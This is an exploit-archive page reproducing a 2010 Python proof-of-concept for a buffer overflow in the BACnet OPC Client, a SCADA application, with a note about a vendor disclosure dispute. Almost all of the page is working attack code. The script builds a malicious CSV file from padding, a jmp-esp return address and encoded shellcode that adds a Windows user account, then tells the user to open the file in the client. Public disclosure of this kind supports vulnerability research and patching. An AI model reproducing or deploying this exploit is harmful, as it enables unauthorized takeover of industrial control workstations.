Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24777
HistorySep 17, 2010 - 12:00 a.m.

BACnet OPC Client Buffer Overflow Exploit

2010-09-1700:00:00
vulners.com
11

#!/usr/bin/python

bacnet.py

BACnet OPC Client Buffer Overflow Exploit

Jeremy Brown [0xjbrown41-gmail-com]

Sept 2010

After communicating via several emails with the vendor, sharing details

about the vulnerability, as well as proof-of-concept code (I also offered

to send the exploit code for them to test themselves), it was clear that

they weren't very interested in fixing the vulnerability. They even ended our

conversation with "Hi Jeremy, thanks but please don't waste my time.", and

quickly became unresponsive to further communication. A couple days later, I

notified them know of my plans to release exploit code to the public, proving

the vulnerability, since they weren't planning on releasing a fix. They didn't

respond with anything indicating plans for an update, so maybe this will help.

If you are a customer (they seem to care much more about your concerns), I would

suggest contacting support at scadaengine.com and ask them to issue a fix.

Successfully tested on Windows XP Service Pack 3 with BACnet OPC CLient 1.0.24

import sys
import struct

ret=0x7C96BF33 # jmp esp @ user32.dll

junk="B"*185

win32_adduser - PASS=ware EXITFUNC=thread USER=sploit Size=497 Encoder=PexAlphaNum

payload=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x30\x42\x50\x42\x50\x4b\x48\x45\x44\x4e\x53\x4b\x58\x4e\x37"
"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x34\x4a\x51\x4b\x58"
"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x38"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x38\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x55\x46\x32\x46\x50\x45\x57\x45\x4e\x4b\x58"
"\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54"
"\x4b\x58\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x48"
"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x43"
"\x42\x4c\x46\x46\x4b\x58\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x57"
"\x4e\x30\x4b\x58\x42\x54\x4e\x30\x4b\x58\x42\x47\x4e\x31\x4d\x4a"
"\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x48\x42\x4b"
"\x42\x30\x42\x30\x42\x30\x4b\x58\x4a\x36\x4e\x43\x4f\x55\x41\x43"
"\x48\x4f\x42\x36\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57"
"\x42\x35\x4a\x36\x4f\x4e\x50\x4c\x42\x4e\x42\x36\x4a\x46\x4a\x49"
"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x4d\x36"
"\x46\x56\x50\x32\x45\x36\x4a\x57\x45\x46\x42\x32\x4f\x42\x43\x56"
"\x42\x42\x50\x36\x45\x36\x46\x57\x42\x52\x45\x57\x43\x47\x45\x36"
"\x44\x37\x42\x32\x43\x47\x42\x57\x4e\x36\x4f\x46\x49\x36\x46\x57"
"\x42\x32\x47\x37\x41\x46\x44\x57\x45\x46\x42\x42\x4f\x42\x41\x34"
"\x46\x34\x46\x44\x42\x32\x48\x42\x48\x42\x42\x52\x50\x36\x45\x56"
"\x46\x47\x42\x42\x4e\x46\x4f\x56\x43\x46\x41\x36\x4e\x56\x47\x56"
"\x44\x47\x4f\x36\x45\x47\x42\x37\x42\x42\x41\x54\x46\x56\x4d\x36"
"\x49\x46\x50\x56\x49\x36\x43\x47\x46\x47\x44\x57\x41\x56\x46\x57"
"\x4f\x46\x44\x47\x43\x37\x42\x42\x43\x47\x42\x47\x4e\x46\x4f\x36"
"\x49\x46\x46\x47\x42\x32\x4f\x32\x41\x34\x46\x34\x46\x34\x42\x50"
"\x5a"
)

csv1="OPC_TAG_NAME,OBJECT_TYPE,INSTANCE,OBJECT_NAME\n\\";
csv2="\\scada,0,0,\n";

if len(sys.argv)<2:
print "Usage: "+sys.argv[0]+" <filename.csv>"
sys.exit(0)

file=sys.argv[1]

retaddr=struct.pack("<L",ret)

csv=csv1+junk+retaddr+"X"*4+payload+csv2

try:
f=open(file,"w")
f.write(csv)
f.close()

except IOError,e:
print e

else:
print "Open %s in the OPC client to exploit the vulnerability." % file